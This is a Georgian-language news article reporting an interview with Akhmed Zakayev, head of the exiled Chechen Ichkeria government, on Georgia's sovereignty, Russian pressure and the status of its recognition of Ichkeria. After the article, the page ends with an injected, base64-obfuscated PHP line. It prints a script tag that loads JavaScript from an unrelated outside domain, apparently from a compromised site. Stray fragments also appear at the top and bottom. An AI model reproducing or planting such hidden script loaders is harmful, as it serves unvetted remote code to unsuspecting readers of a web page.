celsiusi
ავერსი შნაიდერი
დევნილობაში მყოფი ჩეჩნეთის რესპუბლიკა იჩქერიის მთავრობის ხელმძღვანელი აჰმედ ზაკაევი მიიჩნევს, რომ უპირველეს ყოვლისა, საქართველო დამოუკიდებელი და თავისუფალი სახელმწიფო უნდა გახდეს, როგორც ეს იყო 1992 წელს ზვიად გამსახურდიას დროს, რომ მის მიერ დამტკიცებული დოკუმენტაცია – რესპუბლიკა იჩქერიის აღიარება, პრაქტიკაში  იქნეს გააქტიურებული. ამის შესახებ მან რადიო "მაესტროსთან" ექსკლუზიურ ინტერვიუში ისაუბრა. 
 
"დოკუმენტაციას რა თქმა უნდა, აქვს იურიდიული ძალა, მაგრამ ეს პრაქტიკაში მას შემდეგ უნდა იქნეს გააქტიურებული, როგორც კი თავად საქართველო გახდება დამოუკიდებელი, სუვერენული სახელმწიფო, მიუხედავად იმისა, რომ ფორმალურად თითქოსდა ასეთია. საქართველო დღეს რუსეთის მხრიდან ძალიან მკაცრი ზეწოლის ქვეშ იმყოფება, როგორც ჩეჩნეთის რესპუბლიკა. მე ვფიქრობ, რომ დეოკუპაციის შემდეგ, ჩვენი სახელმწიფოებს შორის დიპლომატიური უერთიერთობების ჩამოყალიბებაც მოხდება იმ დოკუმენტების საფუძველზე, რომელიც 1992 წელს იყო მიღებული და 2005 წელს დადასტურებულ იქნა.    
 
მსგავი დოკუმენტი არ კარგავს ძალას, თუ არ არის პარლამენტის მიერ სხვა, ამის გამაუქმებელი გადაწყვეტილება მიღებული. პირიქით, როგორც გითხარით 2005 წელს საქართველოს პარლამენტმა ზვიად გამსახურდიას და მაშინდელი პარლამენტის გადაწყვეტილების დადასტურება მოახდინა." – განაცხადა ზაკაევმა.   
 
ჟურნალისთის კითხვაზე – რატომ მიიჩნევს ის, რომ სასაქართველო დღეს რუსეთის მიერ კონტროლირდება და რა აძლევს ამის თქმის საფუძველს, ზაკაევმა უპასუხა: "ვფიქრობ, რომ აღნიშნული საკითხი ძალიან ღიაა და გამჭვივალე. აღნიშნულზე არა მარტო მე ვსაუბრობ, არამედ ამაზე აქტიურად საუბრობენ პოლიტოლოგებიც. ის ფაქტი, რომ საქართველო ვერ მოხვდა ევროკავშირთან მიმართებაში, გაწევრიანების საკითხში, როგორც ეს სხვა ქვეყნებთან მიმართებაში მოხდა, იმაზე მეტყველებს, რომ საქართველოს ევროინტეგრაციის მიმართულება შეჩერებულია. ეს დასტურია იმისა, რომ საქართველოში რუსეთის სურვილი უფრო სუფევს." – აღნიშნა მან. 
 
 სრული მასალის ნახვა შესაძლებელია აქ:
 
395
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");